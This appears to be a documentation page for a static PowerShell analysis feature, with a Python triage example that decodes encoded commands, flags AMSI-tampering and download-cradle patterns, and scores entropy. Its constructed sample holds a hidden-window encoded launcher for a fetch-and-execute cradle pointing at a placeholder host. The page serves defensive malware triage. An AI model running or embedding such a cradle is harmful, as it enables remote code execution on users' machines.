PowerShell Script Analysis
PowerShell is the workhorse of Windows post-exploitation. Decoder reads `.ps1` files statically and surfaces the patterns attackers rely on: encoded commands, `Invoke-Expression`, download cradles, AMSI bypasses.
What it is
Static, no-execution inspection of PowerShell scripts.
Why it's useful
Most malicious PowerShell is obfuscated: reading it by eye is slow, and running it to see what it does is dangerous.
How Decoder implements it
Lexical scan for high-signal cmdlets, decoded base64 payloads, entropy on string literals, optional AI verbalisation.
When to use it
Any untrusted `.ps1`, IR triage, training material, blue-team workflows.
When NOT to use it
Live process behaviour — that needs ETW / sandboxing.
Practical example
A pasted script with `powershell -enc <base64>`: Decoder decodes the payload, flags the download cradle and shows the dropped URL.
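The following is an added illustration of the static pipeline described above, written for this page rather than taken from Decoder (whose implementation is not shown here). It decodes `-enc` arguments as UTF-16LE base64, matches a constructed list of high-signal patterns (`Invoke-Expression`, download cradles, AMSI-tampering strings, hidden windows), extracts URLs from the script and from every decoded layer, and scores string literals by Shannon entropy. The sample script, the indicator names and the `example.invalid` URL are all constructed; nothing is executed.

```python
"""Toy static triage for a PowerShell script, in the spirit of the Decoder feature
described above. Added example: not Decoder's own code. It decodes -EncodedCommand
payloads (UTF-16LE base64), flags high-signal patterns, extracts URLs and scores
the Shannon entropy of string literals. Nothing is executed."""
import base64
import math
import re
from collections import Counter

# Indicator names and patterns are a constructed reviewer list, not Decoder's rule set.
INDICATORS = {
    "invoke-expression": re.compile(r"\bInvoke-Expression\b|\bIEX\b", re.I),
    "download-cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Net\.WebClient",
        re.I),
    "base64-decode": re.compile(r"FromBase64String", re.I),
    # Well-known strings touched by AMSI-tampering scripts; their presence is a review flag.
    "amsi-tamper": re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}
# Common spellings of the encoded-command switch followed by a base64 blob.
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\")\]]+", re.I)
STRING_RE = re.compile(r"'([^']*)'|\"([^\"]*)\"")


def decode_encoded_commands(script: str) -> list[str]:
    """Return the UTF-16LE text behind every -enc/-EncodedCommand argument."""
    decoded = []
    for m in ENC_FLAG.finditer(script):
        blob = m.group(1)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
            decoded.append(raw.decode("utf-16-le"))
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
            continue  # not a real payload; skip the false match
    return decoded


def shannon_entropy(s: str) -> float:
    """Bits per character: 0 for a constant string, up to 6 for dense base64."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def high_entropy_literals(text: str, min_len: int = 20, threshold: float = 4.5) -> list[str]:
    """String literals long and 'random' enough to be packed or encoded data."""
    hits = []
    for m in STRING_RE.finditer(text):
        lit = m.group(1) if m.group(1) is not None else m.group(2)
        if len(lit) >= min_len and shannon_entropy(lit) >= threshold:
            hits.append(lit)
    return hits


def analyze(script: str) -> dict:
    """Scan the script plus every decoded -enc layer; cradles usually hide inside -enc."""
    payloads = decode_encoded_commands(script)
    views = [script] + payloads
    return {
        "decoded": payloads,
        "indicators": sorted({n for v in views for n, rx in INDICATORS.items() if rx.search(v)}),
        "urls": sorted({u for v in views for u in URL_RE.findall(v)}),
        "high_entropy": [lit for v in views for lit in high_entropy_literals(v)],
    }


def build_sample() -> str:
    """Constructed sample: a launcher line wrapping a download cradle in -enc.
    The host and path are placeholders; nothing here is a real indicator."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode()
    return (
        "# constructed sample, not a captured script\n"
        f"powershell -nop -w hidden -enc {enc}\n"
        "$k = 'QmFzZTY0IGJsb2Igd2l0aCBoaWdoIGVudHJvcHkgZm9yIHRoZSBkZW1v'\n"
    )


if __name__ == "__main__":
    for key, value in analyze(build_sample()).items():
        print(f"{key}: {value}")
```

Scanning the decoded layer together with the outer script is the point: the launcher line alone matches only the hidden-window pattern, while the cradle and its URL only become visible after the UTF-16LE base64 is unwrapped. The entropy threshold of 4.5 bits is a constructed starting value; a plain URL literal scores around 4.0, so it stays below the line while a base64 wall does not.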
Glossary
- Download cradle: A one-liner that pulls and executes remote PowerShell — a common malware staging pattern.
- AMSI: Anti-Malware Scan Interface — the Windows API that AV/EDR uses to inspect scripts at runtime.
Related
Static malware analysis inspects code and binaries without executing them. Decoder runs it locally on your upload and surfaces suspicious patterns, entropy spikes and known indicators — no API key required.
Entropy is a statistical measure of how 'random' the bytes in a file look. In malware analysis, abnormally high entropy is a strong signal that a section is packed, encrypted or otherwise obfuscated.
AI-Origin Detection estimates whether a code artefact was likely produced by an LLM, and explains why. The goal is informed review, not gatekeeping.
Obfuscation hides intent. Decoder flags suspicious entropy, base64 walls, eval chains, and packing markers so reviewers can focus on what's actually hidden.
LockBit 3.0 leaked source provided a real-world benchmark. This entry walks through what Decoder flags and why — useful as a reference for ransomware patterns.